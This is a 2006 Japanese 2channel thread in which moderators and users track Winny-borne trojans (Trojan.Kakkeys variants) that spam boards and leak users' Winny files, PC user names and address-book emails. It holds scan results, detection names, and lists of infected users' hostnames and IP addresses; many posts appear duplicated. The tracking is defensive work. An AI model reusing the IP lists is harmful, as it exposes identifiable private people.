filename: (一般コミック・雑誌)[ジャンプ][2006-18]テニスの王子様Genius307.zip
machine: Machine
result: See the developer notes
filename: 王子307.scr
machine: Machine
result: This file is detected as Trojan.Kakkeys.D. http://www.symantec.com/avcenter/venc/data/trojan.kakkeys.d.html
filename: (一般コミック・雑誌)[ジャンプ][2006-18]BLEACH221(3).zip
machine: Machine
result: See the developer notes
filename: 鰤221 .exe
machine: Machine
result: This file is detected as Trojan.Kakkeys.D. http://www.symantec.com/avcenter/venc/data/trojan.kakkeys.d.html
---
「Trojan.Kakkeys.Dですた」らしい。。。
symantecからレスポンスありました。
---
filename: (一般コミック・雑誌)[ジャンプ][2006-18]BLEACH221.zip
machine: Machine
result: See the developer notes
filename: BLEACH221.scr
machine: Machine
result: This file is detected as Trojan.Kakkeys.D. http://www.symantec.com/avcenter/venc/data/trojan.kakkeys.d.html
filename: (一般コミック・雑誌)[ジャンプ][2006-18]テニスの王子様Genius307.zip
machine: Machine
result: See the developer notes
filename: 王子307.scr
machine: Machine
result: This file is detected as Trojan.Kakkeys.D. http://www.symantec.com/avcenter/venc/data/trojan.kakkeys.d.html
filename: (一般コミック・雑誌)[ジャンプ][2006-18]BLEACH221(3).zip
machine: Machine
result: See the developer notes
filename: 鰤221 .exe
machine: Machine
result: This file is detected as Trojan.Kakkeys.D. http://www.symantec.com/avcenter/venc/data/trojan.kakkeys.d.html
---
「Trojan.Kakkeys.Dですた」らしい。。。
923c⌒っミ `Д)っφ ◆CaKkuEV3EI
NGNG924名無しの報告
2006/03/31(金) 23:17:05ID:Nms+dcMM0 >>923
うぉぉ、今日http://www.symantec.com/region/jp/sarcj/download/jp/JP-N95.htmlでうpだてしたはずなのに検出しないと思ったら、新しいの来てたわ
うぉぉ、今日http://www.symantec.com/region/jp/sarcj/download/jp/JP-N95.htmlでうpだてしたはずなのに検出しないと思ったら、新しいの来てたわ
925AirRock ★
2006/03/32(土) 00:15:54ID:???0 >918の続きです。
tmp6 03/31(金) 18:52:39 〜 03/31(金) 23:57:10
136.119.168.203.megaegg.ne.jp 203.168.119.136
14.46.87.61.ap.seikyou.ne.jp 61.87.46.14
220-213-104-245.pool.fctv.ne.jp 220.213.104.245
a0636.hyper-tsukumi.jp 210.188.114.128
d30162c0.tcat.ne.jp 211.1.98.192
dd37df534.oct-net.ne.jp 211.125.245.52
JJ034185.ppp.dion.ne.jp 211.4.34.185
OFSfa-02p3-147.ppp11.odn.ad.jp 61.209.162.147
OMCfa-01p1-238.ppp11.odn.ad.jp 61.116.143.238
p8036-adsau12honb4-acca.tokyo.ocn.ne.jp 220.97.145.36
p9197-adsao12honb4-acca.tokyo.ocn.ne.jp 219.161.140.197
comic6 03/31(金) 18:33:14 〜 03/31(金) 23:59:54
221.net059085201.t-com.ne.jp 59.85.201.221
KHP059140192247.ppp-bb.dion.ne.jp 59.140.192.247
p3024-ipbf10akatuka.ibaraki.ocn.ne.jp 60.39.176.24
softbank221039230023.bbtec.net 221.39.230.23
softbank221076082017.bbtec.net 221.76.82.17
tmp6 03/31(金) 18:52:39 〜 03/31(金) 23:57:10
136.119.168.203.megaegg.ne.jp 203.168.119.136
14.46.87.61.ap.seikyou.ne.jp 61.87.46.14
220-213-104-245.pool.fctv.ne.jp 220.213.104.245
a0636.hyper-tsukumi.jp 210.188.114.128
d30162c0.tcat.ne.jp 211.1.98.192
dd37df534.oct-net.ne.jp 211.125.245.52
JJ034185.ppp.dion.ne.jp 211.4.34.185
OFSfa-02p3-147.ppp11.odn.ad.jp 61.209.162.147
OMCfa-01p1-238.ppp11.odn.ad.jp 61.116.143.238
p8036-adsau12honb4-acca.tokyo.ocn.ne.jp 220.97.145.36
p9197-adsao12honb4-acca.tokyo.ocn.ne.jp 219.161.140.197
comic6 03/31(金) 18:33:14 〜 03/31(金) 23:59:54
221.net059085201.t-com.ne.jp 59.85.201.221
KHP059140192247.ppp-bb.dion.ne.jp 59.140.192.247
p3024-ipbf10akatuka.ibaraki.ocn.ne.jp 60.39.176.24
softbank221039230023.bbtec.net 221.39.230.23
softbank221076082017.bbtec.net 221.76.82.17
928名無しの報告
NGNG もうずっと人大杉でも止まりませんね…>down
929RockRanger ★
2006/03/32(土) 15:28:29ID:???P >>925の続きですー
〜3/32 14:00:08(tmp6)
〜3/32 14:59:20(comic6)
-tmp6-
59-190-117-92.eonet.ne.jp 154件
softbank221092000083.bbtec.net 34件
OMCfa-01p1-238.ppp11.odn.ad.jp 10件
136.119.168.203.megaegg.ne.jp 9件
p8036-adsau12honb4-acca.tokyo.ocn.ne.jp 7件
softbank218116216024.bbtec.net 2件
14.46.87.61.ap.seikyou.ne.jp 4件
a0636.hyper-tsukumi.jp 2件
-comic6-
softbank220003040058.bbtec.net 72件
TTN202-127-81-29.ttn.ne.jp 70件
p3024-ipbf10akatuka.ibaraki.ocn.ne.jp 8件
softbank221039230023.bbtec.net 6件
221.net059085201.t-com.ne.jp 4件
softbank219012020092.bbtec.net 6件
softbank221089108029.bbtec.net 2件
KHP059140192247.ppp-bb.dion.ne.jp 2件
softbank221076082017.bbtec.net 1件
〜3/32 14:00:08(tmp6)
〜3/32 14:59:20(comic6)
-tmp6-
59-190-117-92.eonet.ne.jp 154件
softbank221092000083.bbtec.net 34件
OMCfa-01p1-238.ppp11.odn.ad.jp 10件
136.119.168.203.megaegg.ne.jp 9件
p8036-adsau12honb4-acca.tokyo.ocn.ne.jp 7件
softbank218116216024.bbtec.net 2件
14.46.87.61.ap.seikyou.ne.jp 4件
a0636.hyper-tsukumi.jp 2件
-comic6-
softbank220003040058.bbtec.net 72件
TTN202-127-81-29.ttn.ne.jp 70件
p3024-ipbf10akatuka.ibaraki.ocn.ne.jp 8件
softbank221039230023.bbtec.net 6件
221.net059085201.t-com.ne.jp 4件
softbank219012020092.bbtec.net 6件
softbank221089108029.bbtec.net 2件
KHP059140192247.ppp-bb.dion.ne.jp 2件
softbank221076082017.bbtec.net 1件
931生姜焼き ★
2006/03/32(土) 15:44:23ID:???0 おっとっと
933通報屋 ◆Y39/vakKjY
2006/03/32(土) 15:57:10ID:qhqPjdT30 軍艦焼★さんが提出していましたが念のため提出しましたー
#あともう一つ別のベンダに転送したいのですが本日オフラインのようで。
#あともう一つ別のベンダに転送したいのですが本日オフラインのようで。
934RockRanger ★
2006/03/32(土) 16:03:22ID:???P >>929のTTN202-127-81-29.ttn.ne.jpですが、ケーブルの共有プライベートアドレスなので
もし可能でしたら解除して頂けませんでしょうか……
もし可能でしたら解除して頂けませんでしょうか……
938名無しの報告
2006/03/32(土) 20:48:10ID:8eR7VV230 TTN202-127-81-29.ttn.ne.jpから2chへばっこんばっこんアクセスしている、
ウイルス感染者を始末して証拠を提示すればOK
ウイルス感染者を始末して証拠を提示すればOK
939名無しの報告
2006/03/32(土) 21:08:15ID:P4i/yIUe0940水色@飛行石 ★
2006/03/32(土) 21:19:23ID:???0 えーと、感染のチェックってみんなどうやってるんだろー?
どんどん撒かれてる亜種についてはー、最新のソフト一つ
程度じゃ検出されないと思うんですけどー。
どんどん撒かれてる亜種についてはー、最新のソフト一つ
程度じゃ検出されないと思うんですけどー。
941軍艦焼 ★
2006/03/32(土) 21:23:55ID:???0942名無しの報告
2006/03/32(土) 21:24:48ID:M84qfvqd0944生姜焼き ★
2006/03/32(土) 22:03:58ID:???0 あ、共有でしたか
すいません
すいません
945水色@飛行石 ★
2006/03/32(土) 22:28:16ID:???0946水色@飛行石 ★
2006/03/32(土) 22:29:45ID:???0 あ、もう日本語の解説ページもあるのかー。
http://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.kakkeys.d.html
http://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.kakkeys.d.html
947水色@飛行石 ★
2006/03/32(土) 22:32:58ID:???0 >3. Winny プロセスが動作中である場合、これは Winny がインストールされているフォルダ内で次のファイルを検索し、その後そのファイルのコンテンツを C:\[日本語の文字].dat へ保存します。
>
> Tab1.txt
> Tab2.txt
> download.txt
この機能ってー、絞り込みを回避するために感染パソコン
同士で書き込みワードをシャッフルする機能みたいですねー。
これによってターゲットもどんどん変えられるんじゃないかなー。
本体を感染させなくてもー。
>
> Tab1.txt
> Tab2.txt
> download.txt
この機能ってー、絞り込みを回避するために感染パソコン
同士で書き込みワードをシャッフルする機能みたいですねー。
これによってターゲットもどんどん変えられるんじゃないかなー。
本体を感染させなくてもー。
949名無しの報告
2006/03/32(土) 22:39:27ID:w7HHsmHR0950名無しの報告
2006/03/32(土) 22:51:52ID:tbQIVhRJO そこで報告されてたのは送付されたのかな?
ひっかからないけど削除したって書いてあるけど。
ひっかからないけど削除したって書いてあるけど。
953水色@飛行石 ★
2006/04/02(日) 00:04:19ID:???0 >>951
ちょっと心配になってきたんですがー、1000まで埋まったあとに
各ウィルスはどういう動きしてましたっけー?
書き込めなかったら次にいっちゃうんじゃないかなー?
もしかしたら、傘にならないよーな気もしてきましたー(汗)。
ちょっと心配になってきたんですがー、1000まで埋まったあとに
各ウィルスはどういう動きしてましたっけー?
書き込めなかったら次にいっちゃうんじゃないかなー?
もしかしたら、傘にならないよーな気もしてきましたー(汗)。
954名無しの報告
2006/04/02(日) 00:24:32ID:l0I0lTdJ0 >>953
埋まってしまうと次へいくけど、
ちょっと前に、スレ本体が埋まってSubject.txtが999って状態のスレがあったんです。
その時は999のスレがdat落ちするまで爆撃は止まってました。
埋まってしまうと次へいくけど、
ちょっと前に、スレ本体が埋まってSubject.txtが999って状態のスレがあったんです。
その時は999のスレがdat落ちするまで爆撃は止まってました。
955名無しの報告
2006/04/02(日) 01:05:42ID:TbQMyYhAO >>953
2get禁止スレはdat番号が一桁少ないので、特定ワードを含んだスレを古い順に爆撃タイプのウィルスの受け皿になれるかも
(申請されているスレタイは爆撃されるように工夫)
なんで上手くいけば、ウィルスの受け皿andウィルスが書き込みしようとする度に上がってくれてウマー
受け皿になれずとも、良い宣伝にはなれるのではないかと
以上より申請させて頂きましたが、誰も見てくれてない予感
2get禁止スレはdat番号が一桁少ないので、特定ワードを含んだスレを古い順に爆撃タイプのウィルスの受け皿になれるかも
(申請されているスレタイは爆撃されるように工夫)
なんで上手くいけば、ウィルスの受け皿andウィルスが書き込みしようとする度に上がってくれてウマー
受け皿になれずとも、良い宣伝にはなれるのではないかと
以上より申請させて頂きましたが、誰も見てくれてない予感
956(^-^)犬 ◆VET4349ZB.
NGNG957名無しの報告
2006/04/02(日) 09:30:38ID:sfd4we7X0 >2get禁止スレはdat番号が一桁少ないので
ソースきぼんぬ
9240000001
ソースきぼんぬ
9240000001
958名無しの報告
2006/04/02(日) 10:43:23ID:fRkW9sT209592get禁止のやつ
2006/04/02(日) 11:04:52ID:lIDkuSYC0 【動画も】レンタルアップローダ(2ちゃんねる完全互換、384M)
http://pc8.2ch.net/test/read.cgi/pcnews/9242006003/l50
【アンケート】退役した tmp5 サーバ欲しい? (2get禁止)
http://pc8.2ch.net/test/read.cgi/pcnews/9242006002/l50
【動画も】レンタルアップローダ(2ちゃんねる完全互換、384M)
http://pc7.2ch.net/test/read.cgi/pc2nanmin/9242006003/l50
【動画も】レンタルアップローダ(2ちゃんねる完全互換、384M)
http://pc8.2ch.net/test/read.cgi/win/9242006003/l50
http://pc8.2ch.net/test/read.cgi/pcnews/9242006003/l50
【アンケート】退役した tmp5 サーバ欲しい? (2get禁止)
http://pc8.2ch.net/test/read.cgi/pcnews/9242006002/l50
【動画も】レンタルアップローダ(2ちゃんねる完全互換、384M)
http://pc7.2ch.net/test/read.cgi/pc2nanmin/9242006003/l50
【動画も】レンタルアップローダ(2ちゃんねる完全互換、384M)
http://pc8.2ch.net/test/read.cgi/win/9242006003/l50
960名無しの報告
2006/04/02(日) 11:10:20ID:AjUJp/jd0 ウイルスの対応
スレッドキーの先等が9だったら対象からはずす
スレッドキーの先等が9だったら対象からはずす
961名無しの報告
2006/04/02(日) 12:03:32ID:AjUJp/jd0 ダウソ板ウイルス対策スレまとめ
【nyreヲチ!】▲▲▲砲撃傘▲▲▲23【動画age】
http://tmp6.2ch.net/test/read.cgi/download/1143616483/
P2Pを狙ったニャーム・ニュイルス解析班 Part53
http://tmp6.2ch.net/test/read.cgi/download/1143224133/
新手のウィルスがダウソ大爆撃中?rigel2
http://tmp6.2ch.net/test/read.cgi/download/1143197171/
2chの動作報告はここで。 パート19
http://qb5.2ch.net/test/read.cgi/operate/1140600013/
■ウィルス爆撃相談所&焼き処【RockBBQ】
http://qb5.2ch.net/test/read.cgi/sec2chd/1140878994/
ダウン板小泉ウィルス(仮称)対策室
http://aa5.2ch.net/test/read.cgi/nanmin/1142776192/
【nyreヲチ!】▲▲▲砲撃傘▲▲▲23【動画age】
http://tmp6.2ch.net/test/read.cgi/download/1143616483/
P2Pを狙ったニャーム・ニュイルス解析班 Part53
http://tmp6.2ch.net/test/read.cgi/download/1143224133/
新手のウィルスがダウソ大爆撃中?rigel2
http://tmp6.2ch.net/test/read.cgi/download/1143197171/
2chの動作報告はここで。 パート19
http://qb5.2ch.net/test/read.cgi/operate/1140600013/
■ウィルス爆撃相談所&焼き処【RockBBQ】
http://qb5.2ch.net/test/read.cgi/sec2chd/1140878994/
ダウン板小泉ウィルス(仮称)対策室
http://aa5.2ch.net/test/read.cgi/nanmin/1142776192/
962名無しの報告
2006/04/02(日) 12:18:34ID:l0I0lTdJ0 ダウソにまた新種が出ているかもー
フシアナageでいろんなスレにいろんな(VIPっぽい)メッセージを書込みます。
電話番号らしきものも何件か書き込まれています。
特定のスレに集中はしていないし、連投している訳でも無さそうです。
ウィルスの仕業なのかどうかは判明していませんが、とりあえず一報
フシアナageでいろんなスレにいろんな(VIPっぽい)メッセージを書込みます。
電話番号らしきものも何件か書き込まれています。
特定のスレに集中はしていないし、連投している訳でも無さそうです。
ウィルスの仕業なのかどうかは判明していませんが、とりあえず一報
963名無しの報告
2006/04/02(日) 13:14:44ID:sfd4we7X0964名無しの報告
2006/04/02(日) 13:58:51ID:6+CqAZPl0 ==============================
2006/02/23〜
【通称】 AntiDojin
==============================
【被害板】 同人板@cimic6
【特徴】
・「著作権守れ」「こんな所でバカやってる暇があったら働け」「自首しろ」等
のフレーズに、スペース・カンマ・ピリオドを混ぜた長文を書き込み
・名前欄に板デフォルト名等を都度入力
・亜種あり(スレタイ対策やデフォ名変更に対応して頻繁に発生)
・ゾヌ2用私設板一覧から同人板のURLを採取
【経緯】
2006/02/23 爆撃開始
2006/02/25 klistからのBBQ焼き開始
2006/02/27 Symantec・トレンドマイクロ等に検体提出、順次検出可能に
2006/02/28 AntiLoチェッカー・有志の駆除ツールが対応
2006/02/28 板一覧取得先が、板名表記変更・UAで拒否
2006/03/01〜沈静化。亜種にも順次対応
【ウイルスの実体確認状況】 Winny2(一般コミック・雑誌) [ジャンプ] など
【アンチウイルス検出状況】
AVG 718 02.27.2006 : PSW.Generic.AGB
DrWeb 4.33 02.27.2006 : Trojan.PWS.Ruby
Ikarus 0.2.59.0 02.27.2006 : Trojan.Win32.Agent.EZ
Kaspersky 4.0.2.24 02.28.2006 : Trojan-Spy.Ruby.Kakkeys.h
Symantec 8.0 02.28.2006 : Trojan.Kakkeys
UNA 1.83 02.27.2006 : Trojan.Spy.Win32.Kakkeys
VBA32 3.10.5 02.27.2006 : Trojan-Spy.Ruby.Kakkeys.h
Trend Micro(バスター) : TROJ_KAKKEYS.I〜K
【参考スレ】
運用・規制系
http://qb5.2ch.net/test/read.cgi/operate/1130918407/455-475 (bbs.cgi)
http://qb5.2ch.net/test/read.cgi/sec2chd/1139102655/548-561 (BBQ)
http://qb5.2ch.net/test/read.cgi/sec2chd/1140878994/1-508 (>1-508)
現地系
http://qb5.2ch.net/test/read.cgi/sec2chd/1140849989/322-326(以下のまとめ)
http://comic6.2ch.net/test/read.cgi/doujin/1140918937/ (自治スレ4)
http://comic6.2ch.net/test/read.cgi/doujin/1140974901/ (自治スレ5)
http://comic6.2ch.net/test/read.cgi/doujin/1141063674/ (自治スレ6)
http://comic6.2ch.net/test/read.cgi/doujin/1141361573/1-320 (自治スレ7)
http://comic6.2ch.net/test/read.cgi/doujin/1140863905/ (情報集積所)
==============================
2006/02/23〜
【通称】 AntiDojin
==============================
【被害板】 同人板@cimic6
【特徴】
・「著作権守れ」「こんな所でバカやってる暇があったら働け」「自首しろ」等
のフレーズに、スペース・カンマ・ピリオドを混ぜた長文を書き込み
・名前欄に板デフォルト名等を都度入力
・亜種あり(スレタイ対策やデフォ名変更に対応して頻繁に発生)
・ゾヌ2用私設板一覧から同人板のURLを採取
【経緯】
2006/02/23 爆撃開始
2006/02/25 klistからのBBQ焼き開始
2006/02/27 Symantec・トレンドマイクロ等に検体提出、順次検出可能に
2006/02/28 AntiLoチェッカー・有志の駆除ツールが対応
2006/02/28 板一覧取得先が、板名表記変更・UAで拒否
2006/03/01〜沈静化。亜種にも順次対応
【ウイルスの実体確認状況】 Winny2(一般コミック・雑誌) [ジャンプ] など
【アンチウイルス検出状況】
AVG 718 02.27.2006 : PSW.Generic.AGB
DrWeb 4.33 02.27.2006 : Trojan.PWS.Ruby
Ikarus 0.2.59.0 02.27.2006 : Trojan.Win32.Agent.EZ
Kaspersky 4.0.2.24 02.28.2006 : Trojan-Spy.Ruby.Kakkeys.h
Symantec 8.0 02.28.2006 : Trojan.Kakkeys
UNA 1.83 02.27.2006 : Trojan.Spy.Win32.Kakkeys
VBA32 3.10.5 02.27.2006 : Trojan-Spy.Ruby.Kakkeys.h
Trend Micro(バスター) : TROJ_KAKKEYS.I〜K
【参考スレ】
運用・規制系
http://qb5.2ch.net/test/read.cgi/operate/1130918407/455-475 (bbs.cgi)
http://qb5.2ch.net/test/read.cgi/sec2chd/1139102655/548-561 (BBQ)
http://qb5.2ch.net/test/read.cgi/sec2chd/1140878994/1-508 (>1-508)
現地系
http://qb5.2ch.net/test/read.cgi/sec2chd/1140849989/322-326(以下のまとめ)
http://comic6.2ch.net/test/read.cgi/doujin/1140918937/ (自治スレ4)
http://comic6.2ch.net/test/read.cgi/doujin/1140974901/ (自治スレ5)
http://comic6.2ch.net/test/read.cgi/doujin/1141063674/ (自治スレ6)
http://comic6.2ch.net/test/read.cgi/doujin/1141361573/1-320 (自治スレ7)
http://comic6.2ch.net/test/read.cgi/doujin/1140863905/ (情報集積所)
==============================
965名無しの報告
2006/04/02(日) 13:59:07ID:6+CqAZPl0 ==============================
2006/03/08〜
【通称】 小泉ウイルス
==============================
【被害板】 Download@tmp6
【特徴】
・スレタイに「ny」を含む一番上のスレに、
下記のパターンの定型文を書き込み(海外からは文字化け)
[マーダー系] 英雄伝説Y 空の軌跡SC まだぁ〜? ピザ まだぁ〜? 等
[偏見系] 日本人のすべては無知な人間です 等
[ヲチスレ系] 良スレ(´・ω・)ス ウィル(´・ω・)ス 等
[勧告系] 馬鹿は放置しる 等
[宣言系] 利用する 便利じゃん 等
[顔文字] キタワァ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。..。.:*・゜゚・* ミ ☆
[嗜好系] 幼女とやりたい今日この頃 等
[犯罪予告] 明日、小泉(以下略)
【経緯】
2006/03/08 爆撃開始
2006/03/11 klistからのBBQ焼き開始
【ウイルスの実体確認状況】
[060309][一般ゲーム][Falcom] 英雄伝説Y 〜空の軌跡SC〜
三国志11 NOCDパッチ
FF12 HDL起動可パッチ
英雄 SCのセーブデータ 等
【アンチウイルス検出状況】 ?
【参考スレ】
運用・規制系
http://qb5.2ch.net/test/read.cgi/sec2chd/1140878994/511-811 (>511-811)
現地系
http://aa5.2ch.net/test/read.cgi/nanmin/1142776192/1-297 (対策室)
==============================
2006/03/08〜
【通称】 小泉ウイルス
==============================
【被害板】 Download@tmp6
【特徴】
・スレタイに「ny」を含む一番上のスレに、
下記のパターンの定型文を書き込み(海外からは文字化け)
[マーダー系] 英雄伝説Y 空の軌跡SC まだぁ〜? ピザ まだぁ〜? 等
[偏見系] 日本人のすべては無知な人間です 等
[ヲチスレ系] 良スレ(´・ω・)ス ウィル(´・ω・)ス 等
[勧告系] 馬鹿は放置しる 等
[宣言系] 利用する 便利じゃん 等
[顔文字] キタワァ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。..。.:*・゜゚・* ミ ☆
[嗜好系] 幼女とやりたい今日この頃 等
[犯罪予告] 明日、小泉(以下略)
【経緯】
2006/03/08 爆撃開始
2006/03/11 klistからのBBQ焼き開始
【ウイルスの実体確認状況】
[060309][一般ゲーム][Falcom] 英雄伝説Y 〜空の軌跡SC〜
三国志11 NOCDパッチ
FF12 HDL起動可パッチ
英雄 SCのセーブデータ 等
【アンチウイルス検出状況】 ?
【参考スレ】
運用・規制系
http://qb5.2ch.net/test/read.cgi/sec2chd/1140878994/511-811 (>511-811)
現地系
http://aa5.2ch.net/test/read.cgi/nanmin/1142776192/1-297 (対策室)
==============================
966名無しの報告
2006/04/02(日) 13:59:25ID:6+CqAZPl0 ==============================
2006/03/24〜
【通称】 ?(Winny検索文字列・PCユーザ名・メールアドレス暴露)
==============================
【被害板】 Download@tmp6
【特徴】
・スレタイに「Winny」「Share」四桁の算用数字を含む各最古スレに並行して、
Winnyインストールフォルダ内のTab1.txt・Tab2.txt・download.txtの内容と
PCのユーザ名を書き込み
当初はsageのみ、後発のageは亜種の疑いあり
・http://tmp6.2ch.net/test/read.cgi/download/1142594523/l50 に、
アドレス帳のアドレス・本人のMSNメッセンジャーのアドレス(先頭1文字伏せ)を、
fusianasanで書き込み
・bbs.cgiを高頻度で起動、subject.txtとSETTING.TXTも強烈に触る模様
【経緯】
2006/03/24 爆撃開始(01:00JSTに一斉発動)
2006/03/24〜root ★氏がサーバ負荷対策中
【ウイルスの実体確認状況】 候補はあるが未特定(以下は候補の一部)
http://tmp6.2ch.net/test/read.cgi/download/1143224133/21
http://tmp6.2ch.net/test/read.cgi/download/1143224133/53-55
http://tmp6.2ch.net/test/read.cgi/download/1143224133/207-229 (※)
http://tmp6.2ch.net/test/read.cgi/download/1143224133/244
http://tmp6.2ch.net/test/read.cgi/download/1143078115/275
http://tmp6.2ch.net/test/read.cgi/download/1142682426/63-65
【アンチウイルス検出状況】 ?(Trojan.Kakkeys.Dの未対応亜種かも)
http://tmp6.2ch.net/test/read.cgi/download/1143224133/216 (※の検出状況)
http://tmp6.2ch.net/test/read.cgi/download/1143224133/229 (※の検出状況)
【参考スレ】
運用・規制系
http://qb5.2ch.net/test/read.cgi/operate/1140600013/469-694 (動作報告)
http://qb5.2ch.net/test/read.cgi/sec2chd/1140878994/764-774 (>764-774)
http://qb5.2ch.net/test/read.cgi/sec2chd/1140878994/812-815 (>812-815)
現地系
http://aa5.2ch.net/test/read.cgi/nanmin/1142776192/298- (対策室)
http://tmp6.2ch.net/test/read.cgi/download/1143224133/ (ニュイルス解析班)
==============================
2006/03/24〜
【通称】 ?(Winny検索文字列・PCユーザ名・メールアドレス暴露)
==============================
【被害板】 Download@tmp6
【特徴】
・スレタイに「Winny」「Share」四桁の算用数字を含む各最古スレに並行して、
Winnyインストールフォルダ内のTab1.txt・Tab2.txt・download.txtの内容と
PCのユーザ名を書き込み
当初はsageのみ、後発のageは亜種の疑いあり
・http://tmp6.2ch.net/test/read.cgi/download/1142594523/l50 に、
アドレス帳のアドレス・本人のMSNメッセンジャーのアドレス(先頭1文字伏せ)を、
fusianasanで書き込み
・bbs.cgiを高頻度で起動、subject.txtとSETTING.TXTも強烈に触る模様
【経緯】
2006/03/24 爆撃開始(01:00JSTに一斉発動)
2006/03/24〜root ★氏がサーバ負荷対策中
【ウイルスの実体確認状況】 候補はあるが未特定(以下は候補の一部)
http://tmp6.2ch.net/test/read.cgi/download/1143224133/21
http://tmp6.2ch.net/test/read.cgi/download/1143224133/53-55
http://tmp6.2ch.net/test/read.cgi/download/1143224133/207-229 (※)
http://tmp6.2ch.net/test/read.cgi/download/1143224133/244
http://tmp6.2ch.net/test/read.cgi/download/1143078115/275
http://tmp6.2ch.net/test/read.cgi/download/1142682426/63-65
【アンチウイルス検出状況】 ?(Trojan.Kakkeys.Dの未対応亜種かも)
http://tmp6.2ch.net/test/read.cgi/download/1143224133/216 (※の検出状況)
http://tmp6.2ch.net/test/read.cgi/download/1143224133/229 (※の検出状況)
【参考スレ】
運用・規制系
http://qb5.2ch.net/test/read.cgi/operate/1140600013/469-694 (動作報告)
http://qb5.2ch.net/test/read.cgi/sec2chd/1140878994/764-774 (>764-774)
http://qb5.2ch.net/test/read.cgi/sec2chd/1140878994/812-815 (>812-815)
現地系
http://aa5.2ch.net/test/read.cgi/nanmin/1142776192/298- (対策室)
http://tmp6.2ch.net/test/read.cgi/download/1143224133/ (ニュイルス解析班)
==============================
レス数が950を超えています。1000を超えると書き込みができなくなります。